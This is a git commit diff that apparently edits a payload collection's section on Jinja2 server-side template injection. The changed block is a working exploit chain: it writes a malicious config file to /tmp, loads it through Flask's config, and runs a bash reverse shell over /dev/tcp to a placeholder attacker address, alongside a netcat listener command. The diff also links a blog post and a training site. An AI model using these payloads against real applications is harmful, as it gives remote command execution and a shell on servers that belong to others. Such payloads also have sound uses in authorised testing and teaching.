Add Template injections + Jinja template injection

This commit is contained in:
Soka 2017-04-01 18:53:43 +03:00
parent 76b15d575e
commit bb98bd9339

View File

@ -53,7 +53,7 @@ nv -lnvp 8000
Inject this template
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
```
@ -61,4 +61,4 @@ Inject this template
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
#### Training
[https://w3challs.com/](https://w3challs.com/)
[https://w3challs.com/](https://w3challs.com/)